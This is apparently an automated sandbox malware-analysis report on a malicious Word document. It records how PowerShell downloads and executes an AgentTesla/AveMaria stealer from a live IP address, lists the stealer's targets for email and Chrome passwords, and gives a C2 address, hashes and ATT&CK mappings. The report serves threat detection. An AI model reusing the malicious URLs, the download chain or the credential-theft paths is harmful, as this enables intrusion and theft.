            Source: Yara matchFile source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
            Contains functionality to steal e-mail passwordsShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: POP3 Password
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: SMTP Password
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: IMAP Password
            Contains functionality to steal Chrome passwords or cookiesShow sources
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: \Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\doc.exeCode function: \Chromium\User Data\Default\Login Data
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AveMaria stealerShow sources
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.doc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.36827d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.doc.exe.35c4200.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting2Create Account1Access Token Manipulation1Disable or Modify Tools11OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer33Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
            Default AccountsNative API1Windows Service1Windows Service1Deobfuscate/Decode Files or Information1Input Capture21System Service Discovery1Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsShared Modules1Scheduled Task/Job1Process Injection321Scripting2Credentials In Files1File and Directory Discovery4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsExploitation for Client Execution32Logon Script (Mac)Scheduled Task/Job1Obfuscated Files or Information3NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsSecurity Software Discovery211SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol121Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaScheduled Task/Job1Rc.commonRc.commonMasquerading3Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesService Execution2Startup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromisePowerShell3Scheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Users1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 492615 Sample: catalogue_2021_samples_list... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 22 other signatures 2->66 8 WINWORD.EXE 306 49 2->8         started        process3 dnsIp4 52 13.92.100.208, 49167, 49168, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->52 42 C:\Users\user\AppData\Local\...\doc[1].exe, PE32 8->42 dropped 44 C:\Users\user\AppData\...\abdtfhghgeghDh .ScT, data 8->44 dropped 46 C:\Users\user\AppData\Local\...\160C60F1.png, 370 8->46 dropped 76 Document exploit detected (creates forbidden files) 8->76 78 Suspicious powershell command line found 8->78 80 Tries to download and execute files (via powershell) 8->80 82 Microsoft Office creates scripting files 8->82 13 powershell.exe 12 8 8->13         started        16 powershell.exe 6 8->16         started        20 notepad.exe 8->20         started        22 2 other processes 8->22 file5 signatures6 process7 dnsIp8 48 C:\Users\user\AppData\Roaming\doc.exe, PE32 13->48 dropped 24 doc.exe 3 13->24         started        50 13.92.100.20 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 16->50 56 Powershell drops PE file 16->56 58 Injects files into Windows application 20->58 file9 signatures10 process11 file12 38 C:\Users\user\AppData\Roaming\maBdogbw.exe, PE32 24->38 dropped 40 C:\Users\user\AppData\Local\...\tmp2C00.tmp, XML 24->40 dropped 68 Multi AV Scanner detection for dropped file 24->68 70 Machine Learning detection for dropped file 24->70 72 Contains functionality to inject threads in other processes 24->72 74 4 other signatures 24->74 28 doc.exe 3 2 24->28         started        32 schtasks.exe 24->32         started        34 doc.exe 24->34         started        36 doc.exe 24->36         started        signatures13 process14 dnsIp15 54 152.67.253.163, 49169, 5300 ORACLE-BMC-31898US United States 28->54 84 Increases the number of concurrent connection per server for Internet Explorer 28->84 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->86 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            catalogue_2021_samples_list_revise_ol.doc45%VirustotalBrowse
            catalogue_2021_samples_list_revise_ol.doc31%ReversingLabsScript-WScript.Trojan.RTFObfustream

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\doc.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\maBdogbw.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            C:\Users\user\AppData\Roaming\doc.exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            C:\Users\user\AppData\Roaming\maBdogbw.exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            14.2.doc.exe.400000.1.unpack100%AviraTR/Redcap.ghjptDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            httP://13.92.10%Avira URL Cloudsafe
            http://13.92.100.208/doc/doc.exe100%Avira URL Cloudmalware
            httP://13.92.100.208/do0%Avira URL Cloudsafe
            httP://13.92.1000%Avira URL Cloudsafe
            152.67.253.1630%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            httP://13.92.100.208/doc/doc.exePE0%Avira URL Cloudsafe
            http://13.92.100.2080%Avira URL Cloudsafe
            httP://13.92.100.208/doc/doc.0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://13.92.100.208/doc/doc.exetrue
            • Avira URL Cloud: malware
            unknown
            152.67.253.163true
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            httP://13.92.1powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            low
            httP://13.92.100.208/doc/doc.exepowershell.exe, 00000005.00000002.429199796.00000000002AF000.00000004.00000020.sdmptrue
              unknown
              httP://13.92.100.208/dopowershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              httP://13.92.100powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              low
              http://www.piriform.com/ccleanerpowershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmpfalse
                high
                http://www.%s.comPApowershell.exe, 00000003.00000002.427543124.00000000022B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.430729698.00000000023D0000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                low
                http://www.piriform.com/ccleanerhttp://www.piriform.com/powershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmpfalse
                  high
                  httP://13.92.100.208/doc/doc.exePEpowershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://13.92.100.208powershell.exe, 00000005.00000002.436469540.00000000035CD000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.piriform.com/ccleanerhttp://www.piriform.coLpowershell.exe, 00000003.00000002.426929590.000000000022F000.00000004.00000020.sdmpfalse
                    high
                    https://github.com/syohex/java-simple-mine-sweeperdoc.exefalse
                      high
                      httP://13.92.100.208/doc/doc.powershell.exe, 00000003.00000002.433090518.000000000382D000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      152.67.253.163
                      unknownUnited States
                      31898ORACLE-BMC-31898UStrue
                      13.92.100.20
                      unknownUnited States
                      8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                      13.92.100.208
                      unknownUnited States
                      8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:492615
                      Start date:28.09.2021
                      Start time:21:16:41
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 47s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:catalogue_2021_samples_list_revise_ol.doc
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:19
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.expl.evad.winDOC@23/22@0/3
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 98.1% (good quality ratio 96.2%)
                      • Quality average: 88.2%
                      • Quality standard deviation: 20.3%
                      HCA Information:
                      • Successful, ratio: 95%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .doc
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      21:17:25API Interceptor80x Sleep call for process: powershell.exe modified
                      21:17:29API Interceptor279x Sleep call for process: doc.exe modified
                      21:17:34API Interceptor1x Sleep call for process: schtasks.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      152.67.253.163hjFNtGCV66.exeGet hashmaliciousBrowse
                        Purchase Order Ref_AP_2021_02258.docGet hashmaliciousBrowse
                          fh9zxJFcRZ.exeGet hashmaliciousBrowse
                            Samples - New_Export_Customer_FV07.docGet hashmaliciousBrowse
                              Pt3cgTQrIm.exeGet hashmaliciousBrowse
                                SKMBT_C36021092056670.docGet hashmaliciousBrowse
                                  13.92.100.20Purchase Order Ref_AP_2021_02258.docGet hashmaliciousBrowse
                                    13.92.100.208Purchase Order Ref_AP_2021_02258.docGet hashmaliciousBrowse
                                    • 13.92.100.208/tcm/audio.exe

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    MICROSOFT-CORP-MSN-AS-BLOCKUS.htm.htmGet hashmaliciousBrowse
                                    • 13.107.213.45
                                    Invoices_391.vbsGet hashmaliciousBrowse
                                    • 20.203.173.201
                                    CPHB7Z2buG.exeGet hashmaliciousBrowse
                                    • 40.93.207.1
                                    xx2wsaL3cJ.exeGet hashmaliciousBrowse
                                    • 40.93.207.1
                                    2awEYXkQvX.exeGet hashmaliciousBrowse
                                    • 13.89.179.12
                                    b2wx6oZNsCGet hashmaliciousBrowse
                                    • 20.108.4.34
                                    E1fBXNeuOQGet hashmaliciousBrowse
                                    • 20.91.208.183
                                    mirkatclpb.x86Get hashmaliciousBrowse
                                    • 20.192.254.49
                                    mirkatclpb.armGet hashmaliciousBrowse
                                    • 20.21.196.35
                                    ho4yrUrdk1Get hashmaliciousBrowse
                                    • 70.37.124.65
                                    uTfW1dzdIkGet hashmaliciousBrowse
                                    • 23.102.19.179
                                    8u6nZbyMxlGet hashmaliciousBrowse
                                    • 13.84.111.152
                                    OTKqvzSZfm.exeGet hashmaliciousBrowse
                                    • 40.93.207.0
                                    fmS6YYhBy1Get hashmaliciousBrowse
                                    • 104.47.96.161
                                    sora.arm7Get hashmaliciousBrowse
                                    • 20.244.127.27
                                    Purchase Order Ref_AP_2021_02258.docGet hashmaliciousBrowse
                                    • 13.92.100.208
                                    L3Gl0GugHoGet hashmaliciousBrowse
                                    • 40.91.215.156
                                    F0ZMmHZif5Get hashmaliciousBrowse
                                    • 20.36.90.155
                                    ov8cmawldvGet hashmaliciousBrowse
                                    • 20.11.137.156
                                    b3astmode.arm7Get hashmaliciousBrowse
                                    • 20.72.134.108
                                    ORACLE-BMC-31898USSlip copy.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    10589TW purchase list.docGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    bluetwozx.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    hjFNtGCV66.exeGet hashmaliciousBrowse
                                    • 152.67.253.163
                                    Invoice M470031261, M470031262, M470031263.exeGet hashmaliciousBrowse
                                    • 193.122.6.168
                                    01_extracted.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    SOA.exeGet hashmaliciousBrowse
                                    • 193.122.6.168
                                    S.O.A.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    Purchase Order Ref_AP_2021_02258.docGet hashmaliciousBrowse
                                    • 152.67.253.163
                                    #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    2acrvok36Y.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    7PUgGUWM2lGet hashmaliciousBrowse
                                    • 193.122.96.94
                                    x86Get hashmaliciousBrowse
                                    • 144.25.108.253
                                    cash payment.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    TT09876545678T8R456.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    fh9zxJFcRZ.exeGet hashmaliciousBrowse
                                    • 152.67.253.163
                                    Swift_6408372.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    Samples - New_Export_Customer_FV07.docGet hashmaliciousBrowse
                                    • 152.67.253.163
                                    Quotation -Scan001_No- 9300340731.doc.exeGet hashmaliciousBrowse
                                    • 158.101.44.242

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Roaming\doc.exehjFNtGCV66.exeGet hashmaliciousBrowse
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exehjFNtGCV66.exeGet hashmaliciousBrowse
                                        C:\Users\user\AppData\Roaming\maBdogbw.exehjFNtGCV66.exeGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:downloaded
                                          Size (bytes):637440
                                          Entropy (8bit):6.333867454868441
                                          Encrypted:false
                                          SSDEEP:12288:JA9Ni+hBr7IUA4S8vxou4AqcUkhPXuFJ:i9Ni+hBr8UAcZtIQXQ
                                          MD5:D8BC91E846E3D624814D4557681F33AD
                                          SHA1:873F451438EFCE56D2BCE9DD9B44BEEFB2C6A28B
                                          SHA-256:30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
                                          SHA-512:78909D822CB9706155B77B85CF1F9A274BE7155C61EE71A49555932A11BA05311F308760B6BAED3338CFCBA6EC1647F010E5B13E25BDE839F67033CD20739A24
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 31%
                                          Joe Sandbox View:
                                          • Filename: hjFNtGCV66.exe, Detection: malicious, Browse
                                          IE Cache URL:http://13.92.100.208/doc/doc.exe
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ra..............0..............&... ...@....@.. ....................... ............@..................................&..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B.................&......H........@...................@...........................................0...........r...p.+..*..0...........r+..p.+..*..0..................+..*".(.....*^..}.....(.......(.....*....0.............+.s....(.......X.......-.*....0..+.........,..{.......+....,...{....o........(.....*..0..1.........s....}.....(......{.... .....3s....o .....{....rA..po!.....{.....K..s"...o#.....{.....o$.....{....rA..po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(*....~....rQ..p(.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\160C60F1.png
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:370 sysV pure executable
                                          Category:dropped
                                          Size (bytes):262160
                                          Entropy (8bit):0.0018490830516166626
                                          Encrypted:false
                                          SSDEEP:3:DlSl/GGjn8+l2eJ/tFLl:DlSESndl
                                          MD5:017A2103FB6E7EA2AF2AC872DE82208C
                                          SHA1:4B6610CF14AD74F5E90783F68D822F1C35F8178A
                                          SHA-256:7E7BE6F128A7FEC4FB24865FF8263CB5FAF58D2D27128AED945B071A966F681E
                                          SHA-512:553ADCADB1C22B9444070C62802B4D59D74CA9CE3D167DE5FED19205E608C28B17A76864AED6415FEE0B3ADE133336A171C213F52ADB8EC409E35859C8F8DC37
                                          Malicious:false
                                          Preview: X.9..... .b.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84C9F23E.wmf
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
                                          Category:dropped
                                          Size (bytes):3730
                                          Entropy (8bit):5.026807168777447
                                          Encrypted:false
                                          SSDEEP:48:vWik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fg:vk7Hgwj+mbYf3LSrhlOs0f5aSdHn63D4
                                          MD5:D7E750614DEB7AF85FA5A66BC4C0372F
                                          SHA1:A33BEA9DA99C11D46A540B9268A93EE6D2453610
                                          SHA-256:C9DF431576EEF442F761A4CC1A2AD6EB331F4CF132A2528460D21574C4583886
                                          SHA-512:D4D72A6A95752407507771C667DB1A475137A1D4886DCE42219D840C0A86CB9D9BEDB2EB8A259386054FA412734AB951F3626630E4421A2C698E8B2EBDFBE0A3
                                          Malicious:false
                                          Preview: ..................................5...........................Segoe UI....C.-.....@.........._....-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{023FDC9E-1C42-46A7-9085-716C914A6086}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3F2A7B0C-5922-426F-95EB-087369317B68}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.355309574382354
                                          Encrypted:false
                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbM:IiiiiiiiiifdLloZQc8++lsJe1Mztl/n
                                          MD5:18FDD179724248D1D2912EDBF4FB51B1
                                          SHA1:89C91C65684E4D2303DBA1D619F6FAED974CDB7D
                                          SHA-256:52FFB34F93DD28CB9300E577FB9935C29FD7C2B640B2FA02488F9C2A9854E31D
                                          SHA-512:D0A1B1F87CA9912EB8B9141C4ABB02985CD98EAC8F8DF624F835584624A3FFC31C35E999395DB78DDD015E4C3A55414099A9385A62C9887506540466603F9262
                                          Malicious:false
                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C6B73EA-9387-4E02-9B96-A36EA329C5C4}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):44618
                                          Entropy (8bit):2.916419264398738
                                          Encrypted:false
                                          SSDEEP:768:R6/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:aFia0Dqeb0nstw29rVzWSgm58F
                                          MD5:506667FCE71121736C27BA0BF079EBAA
                                          SHA1:2A3C5545B148F7D94CFE34BB5A40652ED445AF78
                                          SHA-256:A4B8E6EAAFD665DE327FAEE4894504314E05D7F7556604B084FE77A74A745702
                                          SHA-512:E2378E62C992FF360F70CD094F1734D49F55F9A3542D83D913F36F4535A292A1B4A3F2996E81326EE7B5B753051595CD26F5F546E54D7106CF556915ED5F53A1
                                          Malicious:false
                                          Preview: c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j...d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT
